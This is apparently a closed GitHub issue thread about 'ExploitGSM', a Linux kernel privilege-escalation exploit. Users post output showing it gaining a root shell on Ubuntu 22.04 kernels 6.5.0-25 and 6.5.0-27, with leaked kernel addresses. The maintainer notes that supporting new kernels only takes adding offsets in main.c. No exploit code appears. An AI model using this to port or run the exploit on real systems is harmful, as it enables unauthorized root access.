Closed lehrhardt-tarent closed 6 months ago
No, you should just add new kernel offsets on exploits.
Ok, understood. I've added matching kernel offsets for 6.5.0-27 in main.c and recompiled, and the exploit also works with the latest Ubuntu HWE package then:
./ExploitGSM ubuntu-27
permissible spray -> 500
begin try leak startup_xen!
startup_xen leaked address -> ffffffff8ce933d0
text leaked address -> ffffffff8a800000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
tty port -> 376
tty buffhead -> 136
dead -> 524
waiting setconf dlci thread
Wait 3 sec for ending kernel work execution
We get root, spawn shell
To run a command as administrator (user "root"), use "sudo".
root@machine:/root# uname -a
Linux machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
cool
Hey,
With your latest commits, ExploitGSM6_5 compiles successfully under Ubuntu 22.04. The exploit was successful with kernel package version 6.5.0-25 on my machine:
begin try leak startup_xen!
startup_xen leaked address -> ffffffffbc6933c0
text leaked address -> ffffffffba000000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
tty port -> 376
tty buffhead -> 136
dead -> 524
waiting setconf dlci thread
Wait 3 sec for ending kernel work execution
We get root, spawn shell
To run a command as administrator (user "root"), use "sudo".
See "man sudo_root" for details.
root@machine:/root# uname -a
Linux machine 6.5.0-25-generic #25~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 20 16:09:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
The latest kernel package is 6.5.0-27 with the Ubuntu 22.04 HWE version. If you adjust main.c to match kernel package version 6.5.0-27, the exploit can be executed. However, it just fails. Is the exploit limited to the Ubuntu 6.5.0-25 package, and is 6.5.0-27 safe?